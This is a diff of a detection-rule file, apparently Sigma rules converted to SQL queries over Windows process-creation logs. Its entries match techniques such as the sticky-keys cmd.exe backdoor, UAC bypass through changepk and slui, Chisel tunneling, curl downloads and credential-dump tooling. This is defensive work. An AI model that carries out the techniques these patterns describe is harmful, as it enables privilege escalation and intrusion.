"attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% -all%' ESCAPE '\\' OR CommandLine LIKE '% /all%' ESCAPE '\\' OR CommandLine LIKE '% /FO CSV%' ESCAPE '\\' OR CommandLine LIKE '% -FO CSV%' ESCAPE '\\')) OR (CommandLine LIKE 
'%whoami%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR Description = 'Windows Powershell' OR Product = 'PowerShell Core 6') AND CommandLine REGEXP '.{1000,}')" ], - "filename": "proc_creation_win_whoami_susp_flags.yml" + "filename": "proc_creation_win_powershell_abnormal_commandline_size.yml" }, { - "title": "Dumping Process via Sqldumper.exe", - "id": "23ceaf5c-b6f1-4a32-8559-f2ff734be516", - "status": "test", - "description": "Detects process dump via legitimate sqldumper.exe binary", - "author": "Kirill Kiryanov, oscd.community", + "title": "Suspicious Electron Application Child Processes", + "id": "f26eb764-fd89-464b-85e2-dc4a8e6e77b8", + "status": "experimental", + "description": "Detects suspicious child processes of electron apps (teams, discord, slack...).\nThis could be a potential sign of \".asar\" file tampering (See reference section for more information)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution" ], "falsepositives": [ - "Legitimate MSSQL Server actions" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sqldumper.exe' ESCAPE '\\' AND (CommandLine LIKE '%0x0110%' ESCAPE '\\' OR CommandLine LIKE '%0x01100:40%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\Teams.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\slack.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\discord.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' 
ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\Discord.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\NVSMI\\\\nvidia-smi.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_sqldumper_activity.yml" + "filename": "proc_creation_win_susp_electron_app_children.yml" }, { - "title": "PUA - Chisel Tunneling Tool Execution", - "id": "8b0e12da-d3c3-49db-bb4f-256703f380e5", + "title": "Windows Internet Hosted WebDav Share Mount Via Net.EXE", + "id": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", "status": "experimental", - "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.001" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Some false positives may occur with other tools with similar commandlines" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\chisel.exe' ESCAPE '\\' OR ((CommandLine LIKE '%exe client %' ESCAPE '\\' OR CommandLine LIKE '%exe server %' ESCAPE '\\') AND (CommandLine LIKE '%-socks5%' ESCAPE '\\' OR CommandLine LIKE '%-reverse%' ESCAPE '\\' OR CommandLine LIKE '% r:%' ESCAPE '\\' OR CommandLine LIKE '%:127.0.0.1:%' ESCAPE '\\' OR CommandLine LIKE '%-tls-skip-verify %' ESCAPE '\\' OR CommandLine LIKE '%:socks%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine 
LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_chisel.yml" + "filename": "proc_creation_win_net_use_mount_internet_share.yml" }, { - "title": "Suspicious Msiexec Execute Arbitrary DLL", - "id": "6f4191bb-912b-48a8-9ce7-682769541e6d", + "title": "Suspicious Schtasks Schedule Types", + "id": "24c8392b-aa3c-46b7-a545-43f71657fe98", "status": "experimental", - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", - "author": "frack113", + "description": "Detects scheduled task creations or modification on a suspicious schedule type", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.007" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Legitimate script" + "Legitimate processes that run at logon. 
Filter according to your environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND (CommandLine LIKE '% /y%' ESCAPE '\\' OR CommandLine LIKE '% -y%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\ScriptingObjectModel.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\SoftwareUpdateAdmin.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\ScriptingObjectModel.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\SoftwareUpdateAdmin.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\')) AND NOT 
(((CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_msiexec_execute_dll.yml" + "filename": "proc_creation_win_schtasks_schedule_type.yml" }, { - "title": "File Download Via Curl.EXE", - "id": "9a517fca-4ba3-4629-9278-a68694697b81", + "title": "Suspicious Manipulation Of Default Accounts Via Net.EXE", + "id": "5b768e71-86f2-4879-b448-81061cbae951", "status": "experimental", - "description": "Detects file download using curl.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Scripts created by developers and admins", - "Administrative activity", - "The \"\\Git\\usr\\bin\\sh.exe\" process uses the \"--output\" flag to download a specific file in the temp directory with the pattern \"gfw-httpget-xxxxxxxx.txt \"" + "Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. 
If you experience a lot of FP you could reduce the level to medium" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -O%' ESCAPE '\\' OR CommandLine LIKE '%--remote-name%' ESCAPE '\\' OR CommandLine LIKE '%--output%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% user %' ESCAPE '\\' AND (CommandLine LIKE '% Järjestelmänvalvoja %' ESCAPE '\\' OR CommandLine LIKE '% Rendszergazda %' ESCAPE '\\' OR CommandLine LIKE '% Администратор %' ESCAPE '\\' OR CommandLine LIKE '% Administrateur %' ESCAPE '\\' OR CommandLine LIKE '% Administrador %' ESCAPE '\\' OR CommandLine LIKE '% Administratör %' ESCAPE '\\' OR CommandLine LIKE '% Administrator %' ESCAPE '\\' OR CommandLine LIKE '% guest %' ESCAPE '\\' OR CommandLine LIKE '% DefaultAccount %' ESCAPE '\\' OR CommandLine LIKE '% \"Järjestelmänvalvoja\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Rendszergazda\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Администратор\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrateur\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrador\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administratör\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrator\" %' ESCAPE '\\' OR CommandLine LIKE '% \"guest\" %' ESCAPE '\\' OR CommandLine LIKE '% \"DefaultAccount\" %' ESCAPE '\\' OR CommandLine LIKE '% ''Järjestelmänvalvoja'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Rendszergazda'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Администратор'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrateur'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrador'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administratör'' %' 
ESCAPE '\\' OR CommandLine LIKE '% ''Administrator'' %' ESCAPE '\\' OR CommandLine LIKE '% ''guest'' %' ESCAPE '\\' OR CommandLine LIKE '% ''DefaultAccount'' %' ESCAPE '\\')) AND NOT (CommandLine LIKE '%guest%' ESCAPE '\\' AND CommandLine LIKE '%/active no%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_curl_download.yml" + "filename": "proc_creation_win_net_default_accounts_manipulation.yml" }, { - "title": "Use of VSIISExeLauncher.exe", - "id": "18749301-f1c5-4efc-a4c3-276ff1f5b6f8", + "title": "Potential Recon Activity Via Nltest.EXE", + "id": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", "status": "experimental", - "description": "The \"VSIISExeLauncher.exe\" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects nltest commands that can be used for information discovery", + "author": "Craig Young, oscd.community, Georg Lauenstein", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.discovery", + "attack.t1016", + "attack.t1482" ], "falsepositives": [ - "Unknown" + "Legitimate administration use but user and host must be investigated" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\VSIISExeLauncher.exe' ESCAPE '\\' OR OriginalFileName = 'VSIISExeLauncher.exe') AND (CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe') AND ((CommandLine LIKE '%/server%' ESCAPE '\\' AND CommandLine LIKE '%/query%' ESCAPE '\\') OR (CommandLine LIKE '%/dclist:%' ESCAPE '\\' OR CommandLine LIKE '%/parentdomain%' ESCAPE '\\' OR CommandLine LIKE '%/domain\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/all\\_trusts%' ESCAPE '\\' OR CommandLine LIKE 
'%/trusted\\_domains%' ESCAPE '\\' OR CommandLine LIKE '%/user%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_vsiisexelauncher.yml" + "filename": "proc_creation_win_nltest_recon.yml" }, { - "title": "ConvertTo-SecureString Cmdlet Usage Via CommandLine", - "id": "74403157-20f5-415d-89a7-c505779585cf", + "title": "UAC Bypass Using ChangePK and SLUI", + "id": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", "status": "test", - "description": "Detects usage of the \"ConvertTo-SecureString\" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use to pass password to different powershell commands" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%ConvertTo-SecureString%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\changepk.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\slui.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_powershell_cmdline_convertto_securestring.yml" + "filename": "proc_creation_win_uac_bypass_changepk_slui.yml" }, { - "title": "Potential PlugX Activity", - "id": "aeab5ec5-be14-471a-80e8-e344418305c2", - "status": "test", - "description": "Detects the execution of an executable that is 
typically used by PlugX for DLL side loading starting from an uncommon location", - "author": "Florian Roth (Nextron Systems)", + "title": "Execution from Suspicious Folder", + "id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", + "status": "experimental", + "description": "Detects a suspicious execution from an uncommon folder", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.s0013", "attack.defense_evasion", - "attack.t1574.002" + "attack.t1036" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((((((((((NewProcessName LIKE '%\\\\CamMute.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Lenovo\\\\Communication Utility\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\chrome\\_frame\\_helper.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\application\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\dvcemumanager.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Microsoft Device Emulator\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\Gadget.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Windows Media Player\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\hcc.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\HTML Help Workshop\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\hkcmd.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SysNative\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SysWow64\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\Mc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Security 
Client\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AntiMalware\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\msseces.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Security Center\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft Security Essentials\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\OInfoP11.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Common Files\\\\Microsoft Shared\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\OleView.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\rc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.NET\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Intel\\\\Logs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RSA\\\\MachineKeys\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\NetworkService\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Help\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Media\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\repair\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\security\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_plugx_susp_exe_locations.yml" + "filename": "proc_creation_win_susp_execution_path.yml" }, { - "title": "Tasks Folder Evasion", - "id": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", - "status": "test", - "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", - "author": "Sreeman", + "title": "Suspicious Cabinet File Execution Via Msdt.EXE", + "id": "dc4576d4-7467-424f-9eee-fd2b02855fe0", + "status": "experimental", + "description": "Detects execution of msdt.exe using the \"cab\" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190", + "author": "Nasreddine Bencherchali (Nextron Systems), GossiTheDog, frack113", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.execution", - "attack.t1574.002" + "attack.t1202" ], "falsepositives": [ - "Unknown" 
+ "Legitimate usage of \".diagcab\" files" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%echo %' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\') AND (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\SysWow64\\\\Tasks\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '% /cab %' ESCAPE '\\' OR CommandLine LIKE '% -cab %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_task_folder_evasion.yml" + "filename": "proc_creation_win_msdt_susp_cab_options.yml" }, { - "title": "Suspicious Query of MachineGUID", - "id": "f5240972-3938-4e56-8e4b-e33893176c1f", - "status": "test", - "description": "Use of reg to get MachineGuid information", - "author": "frack113", + "title": "Persistence Via Sticky Key Backdoor", + "id": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", + "status": "experimental", + "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", + "author": "Sreeman", "tags": [ - "attack.discovery", - "attack.t1082" + "attack.t1546.008", + "attack.privilege_escalation" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "low", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Cryptography%' ESCAPE '\\' AND CommandLine LIKE '%/v %' ESCAPE '\\' AND CommandLine LIKE '%MachineGuid%' 
ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%/y %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\cmd.exe C:\\\\windows\\\\system32\\\\sethc.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_machineguid.yml" + "filename": "proc_creation_win_cmd_sticky_keys_replace.yml" }, { - "title": "Sofacy Trojan Loader Activity", - "id": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", + "title": "Suspicious Compression Tool Parameters", + "id": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", "status": "test", - "description": "Detects Trojan loader activity as used by APT28", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detects suspicious command line arguments of common data compression tools", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden", "tags": [ - "attack.g0007", - "attack.execution", - "attack.t1059.003", - "attack.defense_evasion", - "car.2013-10-002", - "attack.t1218.011" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\%APPDATA\\%\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.dat\",%' ESCAPE '\\' OR (CommandLine LIKE '%.dll\",#1' ESCAPE '\\' OR CommandLine LIKE '%.dll #1' ESCAPE '\\' OR CommandLine LIKE '%.dll\" #1' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((OriginalFileName LIKE '7z%.exe' ESCAPE '\\' OR OriginalFileName LIKE '%rar.exe' ESCAPE '\\' OR OriginalFileName LIKE '%Command%Line%RAR%' ESCAPE '\\') AND (CommandLine LIKE '% -p%' ESCAPE '\\' OR CommandLine LIKE '% -ta%' ESCAPE '\\' OR CommandLine LIKE '% -tb%' ESCAPE '\\' OR CommandLine LIKE '% -sdel%' ESCAPE '\\' OR CommandLine LIKE '% -dw%' ESCAPE '\\' OR CommandLine LIKE 
'% -hp%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE 'C:\\\\Program%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_sofacy.yml" + "filename": "proc_creation_win_susp_compression_params.yml" }, { - "title": "Potential Exploitation Attempt Of Undocumented WindowsServer RCE", - "id": "6d5b8176-d87d-4402-8af4-53aee9db7b5d", - "status": "experimental", - "description": "Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "title": "Potential MsiExec Masquerading", + "id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", + "status": "test", + "description": "Detects the execution of msiexec.exe from an uncommon directory", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1036.005" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND CommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND (User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_other_win_server_undocumented_rce.yml" + "filename": "proc_creation_win_msiexec_masquerading.yml" }, { - "title": "HackTool - Impersonate Execution", - 
